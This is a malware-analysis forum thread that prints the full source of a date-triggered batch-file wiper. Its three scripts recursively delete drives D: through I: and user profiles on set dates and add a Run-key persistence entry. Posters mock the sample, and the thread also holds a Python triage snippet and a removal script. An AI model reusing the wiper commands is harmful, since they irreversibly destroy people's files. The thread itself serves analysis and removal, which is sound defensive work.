A forum for reverse engineering, OS internals and malware analysis 

Forum for completed malware requests.
 #17237  by EP_X0FF
 Mon Dec 17, 2012 3:35 pm
Does this trash really need ANY attention? LMAO what a shit is that?

9b4db47010169a5d9a999dd36b0225b3d333220a16f5f58378a44b616e02cc04 is a RAR SFX archive with the rest of the files inside.

2d9ae8e2cdae0496036eaa4a6e38442176e32e8a4eb04f38fdcf074ec8357db3
jucheck.bat
Code:
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop\*.*" /q /s /f
\\start calc

:no
2dc6842bfa2e4b9cf634cfda7036ad7455c93471d91570646c51d866e71f5ee0
WmiPrv.bat
Code:
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

:loop
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\*.*" /q /s /f
\\start calc
exit
:no
sleep for 3000
goto loop
c4b0b7f3ecd960e89891bbb1e0ce69bd1e3bf4826370e8ebe6bd250afba8c110
juboot.bat
Code:
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"
7f6999c8e3a9efa08cc6aac1ee22bab91566896f778d3bafdf7a5319de12ae1d
SLEEP.EXE - batch delay

WOW, just WOW. Super cyber weapon.
Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software.
lolwut?
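Added example, not part of the original post or of the sample: a static triage pass in Python over a batch script that extracts the hard-coded `%date%` trigger comparisons and the recursive wildcard `del` targets seen in the listings above. The function names and the embedded sample lines are constructed for illustration; `%date%` is locale-formatted, so the comparisons only fire where the short date renders as `Mon 12/10/2012`.

```python
import re
from datetime import date

# `if "%date%"=="Mon 12/10/2012" goto yes` style comparisons (US short-date format).
DATE_IF = re.compile(
    r'if\s+"%date%"\s*==\s*"(\w{3}) (\d{2})/(\d{2})/(\d{4})"\s+goto\s+(\w+)', re.I)
# `del <target> /q /s /f`: target quoted or bare, followed by one or more switches.
DEL_CMD = re.compile(r'\bdel\s+(?:"([^"]+)"|(\S+))((?:\s+/\w)+)', re.I)
DAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]

# Constructed sample in the style of the listings above (not a full copy).
SAMPLE = r'''@echo off & setlocal
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no
:yes
IF EXIST d:\ del "d:\*.*" /q /s /f
del "%userprofile%\Desktop\*.*" /q /s /f
:no
'''

def trigger_dates(script):
    """ISO dates of hard-coded %date% comparisons whose weekday is consistent."""
    found = []
    for dow, mm, dd, yyyy, _label in DATE_IF.findall(script):
        try:
            d = date(int(yyyy), int(mm), int(dd))
        except ValueError:          # impossible calendar date, can never match
            continue
        if DAYS[d.weekday()] == dow.title():
            found.append(d.isoformat())
    return sorted(found)

def recursive_wildcard_deletes(script):
    """Targets of `del` commands that combine a wildcard with /s (recurse)."""
    targets = []
    for quoted, bare, switches in DEL_CMD.findall(script):
        target = quoted or bare
        if "*" in target and "/s" in switches.lower().split():
            targets.append(target)
    return targets

def triage(script):
    dates, wipes = trigger_dates(script), recursive_wildcard_deletes(script)
    return {"trigger_dates": dates, "wipe_targets": wipes,
            "time_bomb_wiper": bool(dates) and bool(wipes)}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A script that only clears a temp folder still shows up under `wipe_targets`, but `time_bomb_wiper` stays false without a date trigger.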
 #17240  by hanan
 Mon Dec 17, 2012 6:11 pm
WOW, why do you need a sample? Write it for yourself! (just type randomly at the keyboard and you have something that looks the same :))
 #17263  by dumb110
 Tue Dec 18, 2012 3:15 pm
Yo dawg, I heard you like batch, so I made a batch for your batch.
Code:
@echo off
:start
echo BatchWiper Removal Batch.
echo This will remove BatchWiper from your system and wipe the Temporary folder.
rem Clear any earlier answer; quoted, case-insensitive compares survive empty input.
set "inp="
set /P "inp=Do you want to continue? "
if /i "%inp%"=="y" goto remove
if /i "%inp%"=="n" goto exit
goto start

:remove
echo Removing Startup Entry:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v jucheck.exe /f
echo Removing Files:
rem Paths are quoted so a %systemroot% or %temp% containing spaces still works.
del "%systemroot%\System32\jucheck.exe" /f /q
del "%systemroot%\System32\juboot.exe" /f /q
del "%systemroot%\System32\sleep.exe" /f /q
echo Clearing Temporary Folder:
del "%temp%\*.*" /f /s /q
echo Done.
pause
goto exit

:exit
exit
 #17265  by EP_X0FF
 Tue Dec 18, 2012 4:18 pm
Mad skillz.